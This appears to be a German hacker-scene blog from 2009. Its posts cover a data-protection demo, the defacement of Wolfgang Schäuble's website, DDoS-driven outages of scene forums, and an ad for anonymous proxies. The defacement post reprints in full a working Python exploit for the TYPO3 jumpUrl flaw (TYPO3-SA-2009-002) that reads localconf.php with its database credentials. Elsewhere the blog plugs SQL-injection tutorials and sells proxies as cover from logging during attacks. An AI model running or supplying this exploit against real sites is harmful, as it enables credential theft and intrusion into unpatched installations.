Datenschutzdemo am Aschermittwoch

Hab gerade mitbekommen, dass in Mainz eine Datenschutzdemo am Aschermittwoch statt findet. Waere das nicht so weit weg, waere ich auch mitgekommen ­čśë

“Wir machen eine kleine Demo mit Infostand, verteilen Flyer und zeigen unseren Protest gegen die ├ťberwachungspolitik der Bundesregierung und der Gro├čen Koalition auf Transparenten”, k├╝ndigen die ├ťberwachungsgegner an. Treffen ist um 17 Uhr, eine Stunde vor dem geplanten Auftritt Sch├Ąubles, vor dem Anwesen der Wormser Stra├če 201 in Mainz.

“Bei dieser Gelegenheit werden wir Herrn Sch├Ąuble zeigen, dass wir den fortschreitenden Grundrechteabbau und die ├ťberwachungspolitik der Bundesregierung nicht akzeptieren. Schon bei Sch├Ąubles letztem Besuch in Mainz-Bingen haben wir unseren Protest zum Ausdruck gebracht. Der Innenminister muss bei jedem Auftritt sp├╝ren, dass seine ├ťberwachungspolitik in der Bev├Âlkerung auf Widerstand st├Â├čt. Wir rufen alle Menschen aus Mainz und Umgebung dazu auf, am Mittwoch f├╝r eine neue, freiheitsfreundliche Innenpolitik zu demonstrieren. Freiheit muss wieder einen entscheidenden Stellwert erlangen, unsere Grundrechte d├╝rfen nicht durch immer neue und sch├Ąrfere ├ťberwachungsgesetze ausgeh├Âhlt werden. ├ťberwachung erzeugt Angst und verhindert kritische Reflexion und freie Meinungs├Ąu├čerung. Sie ebnet den Weg in eine kritiklose Gesellschaft”, erkl├Ąren die Aktivisten ihre Ziele im Demo-Aufruf. Sie fordern eine ├ťberpr├╝fung bestehender ├ťberwachungsma├čnahmen und einen Abbau besonders drastischer Ma├čnahmen wie der Vorratsdatenspeicherung sowie einen sofortigen Stopp bei der Einf├╝hrung neuer ├ťberwachungsbefugnisse.

Organisiert wird das ganze von

einem Aktionsb├╝ndnis bestehend aus der Gr├╝nen Jugend, der Linksjugend [solid], der Piratenpartei, dem Arbeitskreis Vorratsdatenspeicherung, dem Chaos Computer Club und der Landessch├╝lerInnenvertretung Rheinland-Pfalz.

Quelle: http://www.gulli.com/news/mainz-datenschutzdemo-am-2009-02-22/

Find ich gut, ich hoff das sowas mal in Stuttgart stattfindet, dann werde ich (ganz bestimmt) mit Patrick_B aka Nazrek auch dabei sein ­čÖé

Im Laufe des heutigen Tages folgt dann noch entweder eine neue Sicherheitsluecke, welche ich aufdecke oder nen kleines Tutorial ueber Truecrypt, wenn wir grad beim Thema Datenschutz sind ­čśë

Website von Wolfgang Sch├Ąuble defaced

Wie sicherlich einige, oder ich denk mal alle ( ­čśÇ ) mitbekommen haben, wurde die Seite von unserem Innenminister (isser doch, oder?) Wolfgang Sch├Ąuble defaced. Grund dafuer war eine Sicherheitsluecke im CMS (Content-Management-System) Typo3.

Die Folgen durch das Ausnutzen der Schwachstelle k├Ânnten f├╝r den jeweiligen Betreiber weit reichend sein. Grund daf├╝r ist unter anderem der m├Âgliche Zugriff auf die Datei localconf.php. In dieser befindet sich das Passwort f├╝r das Installations-Setup sowie der Benutzername und das zugeh├Ârige Kennwort f├╝r die Datenbank. Nach eingehender Betrachtung konnten die Experten den Fehler ausfindig machen. Dieser soll im Zusammenhang mit der jumpUrl-Funktion zum Analysieren der Webzugriffe bestehen.

Typo3, CMS, Typo, Typo3 LogoLaut den offiziellen Angaben sind die Versionen 3.3.x, 3.5.x, 3.6.x, 3.7.x, 3.8.x, 4.0 bis 4.0.11, 4.1.0 bis 4.1.9, 4.2.0 bis 4.2.5 und die Alphaversion 4.3 von dieser Problematik betroffen. Ein zur Verf├╝gung gestelltes Update auf die Versionen 4.0.12, 4.1.10 und 4.2.6 soll diesem Sachverhalt Abhilfe schaffen.

Quelle: http://www.gulli.com/news/typo3-kritische-schwachstelle-2009-02-10/

Sah dort dann etwa so aus:

Oben ein Link zu Vorratsdatenspeicherung.de/ und Links in der Leiste in Link zum Update auf die Neuste Version und die Bitte, das PW zu aendern.

Ist ja nicht das erste mal, das Sch├Ąubles Page defaced wurde, jedoch finde ich das irgendwie sinnlos, da es eher nen Eigentor war und ihn selber nur weiter dazu bringt, mehr auf Ueberwachung zu setzen, damit sowas nicht mehr anonym passieren kann.

Mehr zu dem Thema:
http://computer.t-online.de/c/17/64/27/90/17642790.html
http://www.heise.de/security/Website-von-Wolfgang-Schaeuble-ueber-Typo3-Luecke-gehackt-Update–/news/meldung/132315
http://www.gulli.com/news/typo3-kritische-schwachstelle-2009-02-10/

Laut heise.de war das Passwort “gewinner”, was mich wundert, da das Passwort soviel ich wei├č beim Ersten Deface schon gewinner war…

Wer das Typo3 Exploit sehen will:

#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 <[email protected]>
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
#       typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek
 
import urllib,re,sys
 
strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')
 
def useme():
    print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'
    sys.exit(0)
 
def parsehash(host, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '3:'})
    url = host + '/?' + file
    try:
        s = urllib.urlopen(url)
        r = s.read()
    except Exception, e:
        print '[!] - ', str(e)
        return None
 
    tmp = strip.match(r)
    if tmp:
        return tmp.group(1)
    else:
        return None
 
def content(host, hash, f):
    file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '3:', 'juHash' : hash})
    url = host + '/?' + file
    try:
        s = urllib.urlopen(url)
        print '[+] - content of:', f
        print s.read()
    except:
        print '[!] - FAIL'
 
def main():
    if len(sys.argv) < 2:
        useme()
 
    if len(sys.argv) < 3:
        file = 'typo3conf/localconf.php'
    else:
        file = sys.argv[2]
 
    print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'
    print '[+] - checking typo3 installation on...'
 
    hash = parsehash(sys.argv[1], file)
 
    if not hash:
        print '[!] - version already fixed or 42 went wrong while trying to get the hash'
        sys.exit(234)
 
    content(sys.argv[1], hash, file)
 
 
if __name__ == '__main__':
    main()
 
# milw0rm.com [2009-02-10]

http://milw0rm.com/exploits/8038

Wochenuebersicht

Heyho,

hier ist eine kleine Wochen Uebersicht mit nen paar, naja, “News” was in dieser Woche alles vorgefallen ist.

1) Codesoft.cc macht Pause

Codesoft.cc und seine Scene Tools werden ab dem 1. Maerz 2009 bis gegen Herbst/Winter offline gehen.

Warum?

Der Grund f├╝r die Pause bin ich (tr1p0d). Ich werde f├╝r min. 6 Monate lang weg sein und w├Ąrend dieser Zeit hab ich (selbst wenn ich wollte) keine Chance On zu kommen. Wieso das genau muss die Breite Oeffentlichkeit nicht wissen. Es ist einfach so.

Ich habe zuerst gedacht das man evt. nen Nachfolger f├╝r mich finden k├Ânnte der alles Leitet und ein guter Coder ist. Jedoch habe ich dann das ganze Zerschlagen weil das ganze Team auch einwenig Ausgelaugt ist und wir Gemeinsam Schlussendlich beschlossen haben die Pause einzulegen. W├Ąren dieser Zeit k├Ânnen wir alle wieder Energie und vorallem NEUE Ideen Sammeln. Im Moment kommen viele Projekte hoch wo man aber genau sieht das sie nur ein Abklatsch sind von einem andern wie z.B von Uns. Wir wollen euch aber Neues Bieten und das wird es alles auch geben wenn wir wieder kommen. Kopieren kann jeder, neues schaffen nicht ­čśë

Jedoch, sie kommen wieder, keine Frage ­čśë

Quelle: http://board.codesoft.cc/showthread.php?t=6375

2) FrEe-hAcK down?!

FrEe-hAcK.com ist mal wieder down/offline. Doch warum?

Am fr├╝hen Montagabend wurde die Last eines Angriffes so gro├č, das wir den Server vom Netz nehmen mussten. Zwischenzeitlich prasselten ~300mbps auf den Server ein. Fazit, wir mussten die IP nullrouten. Es wird zur Zeit am neuen Server gerarbeitet. Wieviel Zeit wir noch ben├Âtigen kann ich leider nicht absch├Ątzen.
Ich hatte gehofft Free-Hack bereits am Dienstag wieder in Betrieb zu nehmen, dem war nicht so. Und das ist auch der Grund wieso hier so sp├Ąt erst ein Beitrag erscheint. Sollte es Neuigkeiten geben, erfahrt ihr sie hier.

Quelle: http://blog.free-hack.com/?p=37

Jedoch werden sie, laut eigenen Angaben, vielleicht morgen wieder Online kommen ­čÖé

3) ToKrew.info macht zu

Ein eher nicht so bekanntes Forum macht zu. Alte News aber auch die sollte man erwaehnen und es ist gut, dass der Admin es selber auch eingesehen hat und nicht wie andere reagiert.

Warum?

Dieses Board war als allererstes f├╝r die Birfrost-world Mitglieder gedacht .
Ich wollte nie ein eigenes Forum leiten sondern nur meinen Teammembern ein neues zu Hause bieten …
Den ich war S-Mod bei Bifrost und Koksi (Der Admin) hat dieses Projekt total vernachl├Ąssigt , bis Dateiload schlussendlich den Server k├╝ndigte ­čśë

Warum Ich nun letzendlich das Projekt TOKREW einstelle:
Ich hab nen Sprung auf meiner KarriereLeiter gemacht und zwar nach oben was aber meine Freizeit ziemlich vermindert .
Da hier aber ehh nicht die Welt los ist h├Âren wir an dieser Stelle auf ich beendige auch so meine Zeit in “der Scene” da Ich mich nun sch├Âneren Dingen im Leben wittme .

Quelle: http://www.tokrew.info/forum/index.php?topic=1098.0

Und nun der letzte Punkt betrifft meinen Blog selber, wie einige mitbekommen haben gab es eine lange Downtime und hier ist ein kleines Statement (Zitat aus dem Newsletter):

Seit nunmehr 48 Stunden stehen alle Server unter DDOS mit mehreren hundert mbits Bandbreite.
Da die Server standartm├Ą├čig eine Anbindung von hundert Mbit haben ist eine Abwehr der Angriffe zur Zeit nicht m├Âglich.

Jedoch wird das demnaechst wieder besser werden, denk ich ­čÖé

Am Wochende kommt vllt Teil 4 von meiner SQL Injections Tutorials Reihe, wenn nicht etwas anderes interessantes ­čśë

Wuensch euch allen nen schoenes Wochenende ­čÖé

P.S. Wenn ihr in der naechsten Wochenuebersicht dabei sein wollt, kontaktiert mich, mehr Infos unter “Contact”.

SceneProxy.org – High anonymous Socks

Ich moecht euch heute SceneProxy.org vorstellen.

Warum mache ich auf dieses Projekt aufmerksam? Naja ein Grund ist, dass ich Floo kenne, aber auch da Proxys bzw Socks in der “Szene” wichtiger sind als damals. Damals hatte es keine Sau gejuckt bei ner SQL Injection oder aehnliches, heutzutage loggt jede Page alles, einfach schlimm.. ^^

Ich biete euch:

Ich biete euch SSH und HTTPS-Proxies an

  • 100% Nonlogging
  • Sehr sicher
  • Gute Anbindung
  • Location: Russland

Die Proxies wurden auf den Servern von www.heihachi.net aufgesetzt, sind somit extrem sicher.

Der Vorteil an SSH-Proxies:
Der Traffic wird zus├Ątzlich noch verschl├╝sselt, somit habt ihr eine abh├Ârsichere und direkte Tunnelung zu den Servern, die aufgestellt wurden.

Ich garantiere 30 Tage Uptime, kein Tag weniger oder mehr.
Nonblacklist ist wahrscheinlich, jedoch nicht garantiert.
Sollte der Server ausfallen wird euch die verlorene Zeit gutgeschrieben.

Solltet ihr euch f├╝r die HTTPS-Variante entscheiden:
Diese hat auch gewisse Vorteile gegen├╝ber der SSH-Variante, wie zum Beispiel eine unkomplizierte Einbindung direkt in die Browsereinstellung.

Die Proxies sind zum anonymen surfen geeignet.
Es ist verboten den Dienst f├╝r Spamming zu missbrauchen!!
Wer seine Logindaten weitergibt wird ohne Vorwarnung vom Dienst ausgeschlossen

Wie installiere ich den Proxy?
HTTPS-Proxy:
Proxifier downloaden, Logindaten eingeben und als Proxytyp HTTPS angeben.
IP-Adresse und Port wird dir im Supportsystem mitgeteilt.

SSH-Proxy:
Tunnelier downloaden und die Profildatei laden, welche wir dir im Supportsystem zukommen lassen werde.
Proxifier downloaden, Logindaten eingeben und als Proxytyp HTTPS angeben.
Als IP-Adresse wird 127.0.0.1 angegeben, als Port 10000

Preis: 10ÔéČ/30 Tage

Ich nehme offline erworbene Paysafecards ohne Geheimfrage an und Webmoney (NEU)

Wie bestelle ich?
Ihr meldet euch im Supportsystem vom Proxyshop, der unter http://sceneproxy.org erreichbar ist.
Sollte kein Supporter online sein, so hinterlasst euren gew├╝nschten Loginname, euer Loginpasswort und den Paysafecardcode (inkl. Passwort) und tragt unbedingt eure echte Mailadresse ein, an die alles wichtige geschickt wird.
Auf der Homepage ist nochmals eine kleine FAQ.

Wir haben unsere Supporter, die f├╝r euch gerne Fragen beantworten.
Nutzt das System, damit eine sp├Ątere Zuordnung vereinfacht werden kann”

Effektiv Werben auf J0hnX3r.org – kleiner spa├č ­čśë

Statement zu Universalcrew.org

Hi,

da universalcrew.org seit einigen Monaten leider nicht mehr zu Erreichen ist, wuerde ich gerne ein kleines Statement dazu abgeben, da ich dort ja S-Moderator war.

Es fing so an, dass die Admins Devil & iLLu444 Werbung fuer das Forum bei 1337crew gepostet hatten (meine Meinung dazu kennen denk ich einige und ich will dazu auch keine Kommentare sagen) und naja.. dann fing es schon an und einige dort posteten sinnlose Kommentare. Irgendwann meinten 2 Member von 1337crew einen auf “Wie viel haelt der Server aus? Wetten ich bekomm euch in┬á 2 min down” zu machen und meinten sie muessten das Forum DDoSen.

Das sah am Ende dann etwa so aus:

Aufjedenfall ging es dann weiter bis.. der Hoster dies nicht mehr akzeptierte und den Account sperrte. Entweder wir wuerden auf einen staerkeren Server wechseln oder wir sollten uns nen neuen Hoster suchen. Kann man ja auch verstehen, da die anderen Kunden die aufm gleichen Server hosten ja dann auch Probleme bekommen wegen nicht Erreichbarkeit. Aufjedenfall war Universalcrew nun also nicht mehr erreichbar.. was sie leider bis heute immernoch nicht ist, da sich iLLu444 nicht mehr meldet. Und nur er allein kann (oder konnte) ein Backup vom Hoster holen/verlangen..

Ob Universal Crew zurueck kommt oder nicht wei├č ich nicht, ich wollte nur das die meisten von euch nun wissen, warum es Universal Crew (im moment) nicht mehr gibt.